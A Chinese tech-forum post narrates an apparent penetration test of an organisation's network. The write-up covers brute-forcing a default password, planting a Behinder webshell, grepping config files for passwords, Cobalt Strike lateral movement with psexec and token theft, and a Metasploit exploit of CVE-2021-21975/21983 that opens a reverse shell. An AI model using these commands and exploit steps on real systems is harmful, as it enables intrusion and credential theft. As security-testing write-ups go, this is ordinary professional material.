电脑疯子技术论坛|电脑极客社区

微信扫一扫 分享朋友圈

已有 532 人浏览分享

记一奇葩弱口令到内网实战

[复制链接]
532 0
一、前期打点

拿到目标后首先要做的就是信息收集,这次给的目标就给个单位名称,通过互联网上搜索发现其网站在阿里云上
着实无奈,在这里推荐个寻找资产的方法,利用ICP/IP地址/域名信息备案管理系统经查询,查询地址如下:

QQ截图20220711150021.png

利用该平台进行查询时需要知道准确的单位名称,可利用该平台查询出已经备案的网站域名对于
只给了单位名称,进行信息收集还是很有效果的。
拿到域名后就会对域名就行子域名扫描了,子域名扫描工具还是很多的,就不在一一展开列举推线一个
在线子域名查找工具,多试试几个子域名扫描工具往往会有意外

QQ截图20220711150107.png

扫到域名通过判断域名解析ip的归属地,可基本判断该域名所在服务器是目标单位自身资产
也就是有突破内网的希望,可值得一试。

通过查看该网站源码发现,其username长度为4,可初步判断,该网站用户名可能是4位数字

159.png

进一步测试发现,该系统还存在账号枚举,于是利用该漏洞,成功枚举出两个账号

158.png

有了账号然后就要进行暴力破解了,加载字典进行破解,发现了一个奇葩的密码
!@#\$%%5e%26%2a()
当时看到密码瞬间无语,第一反应就是我的字典还有这密码,这算弱口令么。不管如何总算跑出来了,于是进行登录发现
总是提示密码错误,明明burp已经提示302,为啥浏览器还是提示密码错误呢,在细看密码,猜测可能是被浏览器自动编
码了通过抓包发现,果然编码了,burp抓包替换下就可以了,成功登录系统。那我是不是可以大胆猜测一下,这个账号密
码应该是系统默认密码,估计用户可能也没登过。

156.png

登录后台就好说了,找找有没有注入、上传之类的通用漏洞,测试发现有个新建配置信息发现存在一个
上传没有做任何限制,可轻松上传冰蝎,并且直接返回了路径,瞬间开心。

133.png

128.png

冰蝎连接,发现权限为iis权限,服务器出网,未发现杀毒软件,先翻翻服务器上的文件吧,发现还存在一个tomcat
于是又传了个tomcat马,执行命令发现为system权限,这下连提权都省了,还可以用如下命令找找一些配置文件中
的账号密码,往往会有惊喜出现

#linux
find / -regextype posix-extended -regex ".*\.(properties|xml|cnf|yaml|ini)" | xargs egrep -i "pass|pwd|jdbc

#windows

find /s /i "password" *.properties

此处搜索到配置文件中的一些数据库连接账号、密码以及其他的一个网段

126.png

靶机信息收集基本就结束了,接着就是上cs、搭建代理,做内网,利用cs读出服务器账号密码
利用代理远程连接

122.png

二、内网探测

在这次内网中用到了cs的smb进行横向,先简单介绍下smb
beacon, SMB Beacon 使用命名管道通过一个父 Beacon 进行通信,这种对等通信对同一台主机上的Beacon 和跨网络的
Beacon 都有效。流量封装于SMB协议中,所以SMB beacon相对隐蔽,可在一定程度上绕过防护设备,smb
beacon的具体配置此处不在赘述,具体操作可参考cd的用户手册。

121.png

当内网机器不出网时,可利用SMB Beacon 的主机必须接受445端口上的连接,利用现有主机执行
portscan扫描445端口

109.png

也可用 net view 命令来查找目标所在域的域内目标,在视图表中会显示所有的目标

108.png

可以利用psexec模块登录其他主机

106.png

还可进行Token窃取steal token,然后在利用psexec进行登录

105.png

利用该方法成功探测一个20的ip网段,接着进行内网探测,主要利用fscan进行内网扫描发现内网
存在多台相同密码服务器

99.png

通过登录一台服务器对服务器进行信息收集,在其浏览器上发现网神安全设备

98.png

同样密码登录网神入侵防御系统

97.png

进一步探测发现深信服安全产品

96.png

发现网内存在vcenter,配合CVE-2021-21975以及CVE-2021-21983,可成功获取该服务器权限
主要利用msf获取权限

msf6 > use exploit/linux/http/vmware_vrops_mgr_ssrf_rce
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set rhosts xx.xx.xx.xx.xx
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > set lhost xx.xx.xx.xx
msf6 exploit(linux/http/vmware_vrops_mgr_ssrf_rce) > run
  • Started reverse TCP handler on xx..xx.xx.xx:4444
  • Starting SSRF server...
  • Using URL: https://0.0.0.0:8443/XtwOOPWn9SJ7
  • Local IP: https://xx.xx.xx.xx:8443/XtwOOPWn9SJ7
  • Executing automatic check (disable AutoCheck to override)
  • Leaking admin creds via SSRF...
  • xx.xx.xx.xx:8443/XtwOOPWn9SJ7#
  • xx.xx.xx.xx connected to SSRF server!
  • Server stopped.
    id
    uid=1000(admin) gid=1003(admin) groups=1003(admin),0(root),25(apache),28(wheel)

    93.png

    简单介绍该漏洞原理如下:

    Reality
    Smasher”利用 CVE-2021-21975 窃取 vRealize
    的“maintenanceAdmin”帐户凭据。这是通过使用此存储库中包含的密钥和证书托管 HTTPS
    侦听器来实现的。这些凭据用于所有后续已验证的请求。首先,管理员帐户的散列密码被请求并存储以备后用。

    然后使用
    CVE-2021-21983
    覆盖“admin.properties”文件。接下来请求设置管理员用户的初始密码。这是允许的,因为管理员的凭据存储在
    admin.properties中。如果没有此文件,vRealize
    会认为从未设置过凭据并接受未经身份验证的“/security/adminpassword/initial”请求。
    重置vcenter密码(在获得用户允许的情况下进行的该操作),可成功登录系统,获取主机控制权限

    92.png

    查看内网服务器上的配置发现,zabbix配置文件存在xx.xx.60.xx,进而又发现新的网段,发现多个数据库

    91.png

    90.png

    存在数据防泄露系统,可对监测主机进行文件操控

    89.png

    发现存在部分打印机,可查看打印文件,猜测该段可能是办公内网段

    88.png

    三、小结

    简单总结下,本次的测试内网资产还是比较多的,总共有3个网段,信息收集不管是对于内网还是外网的打点都是很重要的只
    有足够仔细才能有意外的收货,翻翻服务器上的主机文件也许就能意外发现其他网段,甚至是密码本之类的文件;还有就是对
    漏洞的一些验证积累,当然有0day就好,没有0day日常的1day复现也是不错的,平时技巧的积累也会起到关键作用。

  • 您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    1

    关注

    0

    粉丝

    9021

    主题
    精彩推荐
    热门资讯
    网友晒图
    图文推荐

    Powered by Pcgho! X3.4

    © 2008-2022 Pcgho Inc.